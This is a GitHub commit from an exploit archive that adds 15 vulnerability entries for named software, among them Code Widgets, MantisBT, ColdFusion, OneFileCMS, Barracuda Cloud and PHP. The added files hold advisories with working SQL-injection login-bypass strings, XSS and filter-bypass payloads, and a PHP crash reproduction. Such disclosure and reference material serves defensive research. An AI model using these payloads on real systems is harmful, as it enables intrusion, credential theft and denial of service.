Skip to content

Commit a828258

Browse files
author
Offensive Security
committed
Update: 2015-02-15
15 new exploits
1 parent fafd87d commit a828258

16 files changed

Lines changed: 454 additions & 1 deletion

File tree

files.csv

Lines changed: 15 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -26932,7 +26932,7 @@ id,file,description,date,author,platform,type,port
2693226932
30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
2693326933
30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
2693426934
30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
26935-
30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0
26935+
30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0
2693626936
30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0
2693726937
30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0
2693826938
30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0
@@ -32500,3 +32500,17 @@ id,file,description,date,author,platform,type,port
3250032500
36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
3250132501
36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0
3250232502
36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
32503+
36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application 'admin.asp' Multiple SQL Injection Vulnerabilities",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
32504+
36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu 'category.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
32505+
36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
32506+
36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection Vulnerability",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
32507+
36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion 'probe.cfm' Cross Site Scripting Vulnerability",2011-08-18,G.R0b1n,cfm,webapps,0
32508+
36068,platforms/php/webapps/36068.txt,"MantisBT <= 1.1.8 Cross Site Scripting and SQL Injection Vulnerabilities",2011-08-18,Net.Edit0r,php,webapps,0
32509+
36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0
32510+
36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow Vulnerability",2011-08-19,KedAns-Dz,windows,dos,0
32511+
36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 'onefilecms.php' Cross Site Scripting Vulnerability",2011-08-21,mr.pr0n,php,webapps,0
32512+
36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x 'index.php' Cross Site Scripting Vulnerability",2011-08-22,"mehdi boukazoula",php,webapps,0
32513+
36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 'index.php' SQL Injection Vulnerability",2011-08-22,"Eyup CELIK",php,webapps,0
32514+
36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
32515+
36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
32516+
36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0

platforms/asp/webapps/36063.txt

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/49207/info
2+
3+
Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
The following example input is available:
8+
9+
Username : ' or 1=1 or ''=''
10+
Password: ' or 1=1 or ''=''

platforms/asp/webapps/36064.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49208/info
2+
3+
Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/CS0106/category.asp?cat=[sqli]

platforms/asp/webapps/36065.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49209/info
2+
3+
Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/CS0077/main.asp?key=[sqli]

platforms/asp/webapps/36066.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49210/info
2+
3+
Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/CS0099/index.asp?Q=2&A=[sqli]

platforms/cfm/webapps/36067.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49220/info
2+
3+
Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
6+
7+
http://www.example.com/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>

platforms/cgi/webapps/35900.txt

Lines changed: 143 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,143 @@
1+
Document Title:
2+
===============
3+
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
4+
5+
6+
References (Source):
7+
====================
8+
http://www.vulnerability-lab.com/get_content.php?id=754
9+
10+
Barracuda Networks Security ID (BNSEC): 731
11+
12+
13+
Release Date:
14+
=============
15+
2015-01-19
16+
17+
18+
Vulnerability Laboratory ID (VL-ID):
19+
====================================
20+
754
21+
22+
23+
Common Vulnerability Scoring System:
24+
====================================
25+
4.5
26+
27+
28+
Abstract Advisory Information:
29+
==============================
30+
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
31+
32+
33+
Vulnerability Disclosure Timeline:
34+
==================================
35+
2015-01-19: Public Disclosure (Vulnerability Laboratory)
36+
37+
38+
Discovery Status:
39+
=================
40+
Published
41+
42+
43+
Affected Product(s):
44+
====================
45+
Barracuda Networks
46+
Product: Cloud Control Center 2014 Q2
47+
48+
49+
Exploitation Technique:
50+
=======================
51+
Remote
52+
53+
54+
Severity Level:
55+
===============
56+
Medium
57+
58+
59+
Technical Details & Description:
60+
================================
61+
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
62+
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes.
63+
64+
The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling
65+
to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
66+
67+
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20)
68+
the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after
69+
the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context
70+
of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in
71+
the cloud series products.
72+
73+
The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
74+
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
75+
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
76+
of affected or connected module context.
77+
78+
Vulnerable Request Method(s):
79+
[+] POST & GET
80+
81+
82+
Proof of Concept (PoC):
83+
=======================
84+
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
85+
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
86+
87+
PoC:
88+
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
89+
90+
PoC:
91+
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
92+
93+
94+
Solution - Fix & Patch:
95+
=======================
96+
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
97+
Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context
98+
that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
99+
100+
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
101+
102+
103+
Security Risk:
104+
==============
105+
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
106+
107+
108+
Credits & Authors:
109+
==================
110+
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
111+
112+
113+
Disclaimer & Information:
114+
=========================
115+
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
116+
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
117+
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
118+
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
119+
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
120+
policies, deface websites, hack into databases or trade with fraud/stolen material.
121+
122+
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
123+
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
124+
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
125+
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
126+
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
127+
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
128+
129+
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
130+
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
131+
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
132+
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
133+
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
134+
135+
Copyright � 2015 | Vulnerability Laboratory - [Evolution Security GmbH]�
136+
137+
--
138+
VULNERABILITY LABORATORY - RESEARCH TEAM
139+
SERVICE: www.vulnerability-lab.com
140+
CONTACT: research@vulnerability-lab.com
141+
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
142+
143+

platforms/php/dos/36070.txt

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
source: http://www.securityfocus.com/bid/49249/info
2+
3+
PHP is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.
4+
5+
An attacker can exploit these issues to cause an application written in PHP to crash, denying service to legitimate users.
6+
7+
PHP 5.3.7 is vulnerable; other versions may also be affected.
8+
9+
127# ulimit -m 100000
10+
127# ulimit -v 100000
11+
127# cat /www/strtotime.php
12+
<?php
13+
$strx=str_repeat("A",$argv[1]);
14+
var_dump(strtotime($strx));
15+
?>127#
16+
127# /cxib/5371/build/bin/php /www/strtotime.php 33388888
17+
Memory fault (core dumped)
18+
19+
127# gdb -q /cxib/5371/build/bin/php
20+
(gdb) r /www/strtotime.php 33388888
21+
Starting program: /cxib/5371/build/bin/php /www/strtotime.php 33388888
22+
23+
Program received signal SIGSEGV, Segmentation fault.
24+
0x0806e8bd in add_error (s=0xbfbfcf90,
25+
error=0x83ea7d8 "Double timezone specification")
26+
at /cxib/5371/ext/date/lib/parse_date.c:355
27+
355 s->errors->error_messages[s->errors->error_count -
28+
1].position = s->tok ? s->tok - s->str : 0;
29+
(gdb) print s->errors->error_messages
30+
$1 = (struct timelib_error_message *) 0x0
31+
(gdb) print s->errors->error_count
32+
$2 = 1835009

platforms/php/webapps/36068.txt

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/49235/info
2+
3+
MantisBT is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
4+
5+
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
MantisBT 1.2.6 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/path/search.php?project_id=[XSS]
10+
http://www.example.com/path/core.php?mbadmin=[SQL]

platforms/php/webapps/36072.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/49257/info
2+
3+
OneFileCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
OneFileCMS 1.1.1 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee>

0 commit comments

Comments
 (0)